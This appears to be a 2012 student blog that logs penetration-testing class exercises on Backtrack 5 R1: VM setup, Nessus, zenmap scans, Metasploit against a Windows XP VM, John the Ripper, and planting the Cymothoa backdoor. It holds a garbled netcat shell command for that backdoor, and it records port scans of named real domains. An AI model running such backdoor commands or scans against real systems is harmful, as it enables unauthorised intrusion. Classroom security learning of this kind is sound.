Tuesday, January 31, 2012

Put Cymothoa to Ubuntu by Using NC

Now I try to make a backdoor with NC to inject Cymothoa into Ubuntu.
For the first step, I open the Cymothoa tool, which is located in Apps -> Maintaining Access -> OS Backdoors -> Cymothoa.
Then I typed the command:  root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 12345 -e > cy /bin/bash

Privilege Escalation Part 2 : Cracking Password With John The Ripper

Now I try to crack the password that I got in my previous article. I use the John The Ripper tool in my Backtrack 5 R1.
John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (11 architecture-specific flavors of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others.
John The Ripper is located in Apps -> Privileges Escalation -> Password Attacks -> Offline Attacks -> John The Ripper.

Monday, January 30, 2012

Privilege Escalation Part 1

Today I learned about privilege escalation in my class. Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
I tried to do privilege escalation on host 192.168.0.21.

Saturday, January 28, 2012

How To Exploit Windows XP with Metasploit

OK, in this session we will try to exploit Windows XP with Metasploit.
My victim is a Windows XP machine that I've installed in my VirtualBox.
As a first step, we try to get information about our victim with the Zenmap or Nmap tools.

From the picture above I know that the host with IP address 192.168.56.101 is running the Windows operating system.
OK, now we try to connect to that IP address.

Friday, January 27, 2012

Vulnerability Assessment and Exploitation With ExploitDB

Today I've been learning about Vulnerability Assessment and Exploitation in my class.
A vulnerability is a weakness that allows an attacker to enter and get access to the targeted computer.
An example of a software vulnerability is a buffer overflow. An example of a human vulnerability is that person's security awareness, and an example of a hardware vulnerability is hardware that is unsecured or unprotected.
In this session I've used the Nessus and exploitdb tools in Backtrack 5 R1.
OK, first, I'll do the information gathering step to search for an interesting host which has the most services.
In this step, I use the zenmap tool.
After scanning, I got 1 interesting host. That was the host with IP address 192.168.0.67.

Thursday, January 26, 2012

How To install Nessus On Backtrack 5 R1

In this session, I'll try to install Nessus on my Backtrack 5 R1.
First, download Nessus from http://www.nessus.org/.
I placed the Nessus package in the directory /root/Tugas 2/.
After that I tried to install Nessus with the command:

root@bt:~# cd /root/Tugas\ 2/
root@bt:~/Tugas 2# dpkg -i Nessus-4.4.1-ubuntu910_i386.deb 
Selecting previously deselected package nessus.
(Reading database ... 314453 files and directories currently installed.)
Unpacking nessus (from Nessus-4.4.1-ubuntu910_i386.deb) ...
Setting up nessus (4.4.1) ...

 - Please run /opt/nessus/sbin/nessus-adduser to add a user
 - Register your Nessus scanner at http://www.nessus.org/register/ to obtain
   all the newest plugins
 - You can start nessusd by typing /etc/init.d/nessusd start
Processing triggers for ureadahead ...

Wednesday, January 25, 2012

Information Gathering Part 2

OK, now I'll try to do Information Gathering again.
I'll try to get information from 3 domains.
They are:
1. is2c-dojo.com
2. is2c-dojo.net
3. spentera.com

First, I try to find information about is2c-dojo.com with who.is.
With who.is, we can get a lot of information, such as:

  1. IP address
  2. Creation Date
  3. Expiration Date
  4. Registrar
  5. Name Servers 
  6. Server Type
  7. Website Status
  8. Domain servers
  9. Registrant Data
  10. Contact Persons
  11. etc.

After I searched for it, I found information like this.

After I got an IP address for that domain, I tried to find the ports which are open on that domain.
I tried with zenmap against IP address 67.222.154.106,
and the result is like this.

From the information above, I found that there are 9 ports and services open on that IP address.
They are:
  1. port 21 service ftp
  2. port 53 service domain
  3. port 80 service http
  4. port 110 service pop3
  5. port 143 service imap
  6. port 443 service http
  7. port 993 service imap
  8. port 995 service pop3
  9. port 25 service smtp

Information Gathering Part 1

Today, I've been learning about information gathering in my class.
I've tried to use some tools in Backtrack 5 R1.
As the first tool, I tried zenmap.
Zenmap is located in Apps -> Information Gathering -> Networks Analysis -> Network Scanners -> zenmap


In the Target field, I typed the IP address of the network which I want to scan.
I typed 192.168.0.10/24, and then the scanning result is ...


Tuesday, January 24, 2012

How To Install Ubuntu on VBOX and How To Connect it From Host to Guest

In this note, I will try to install Ubuntu on VM VirtualBox in Backtrack.
First, open VirtualBox. In this note, I use Oracle VM VirtualBox.
Then, on the toolbar, we choose New. Then we click the Next button.
Then type the name of the virtual device which we are making. For my device, I typed Ubuntu. After that we click Next again.
Then we set the size of the RAM which we will use. I use 512MB.
Then we click Next again.


In this session we click Next again and then Next again until you see a menu to specify how much memory you want to use in your Windows virtual box, as in the picture below.

In my virtual box, I use 6 GB Memory. Then click Next again and then click Create and Create again.
Then we click Start on Ubuntu and then click Next.
Choose the location where you want to install Ubuntu.

Monday, January 23, 2012

How To Install Windows XP on VM VirtualBox Machine and Connect From Host to Guest

In this note, I will try to install Windows XP on VBox in Backtrack 5 R1.
First we open VBox in Backtrack 5 R1.

Then, on the toolbar, we choose New. Then we click the Next button.
Then type the name of the virtual device which we are making. For my device, I typed Windows. After that we click Next again.
Then we set the size of the RAM which we will use. I use 256MB.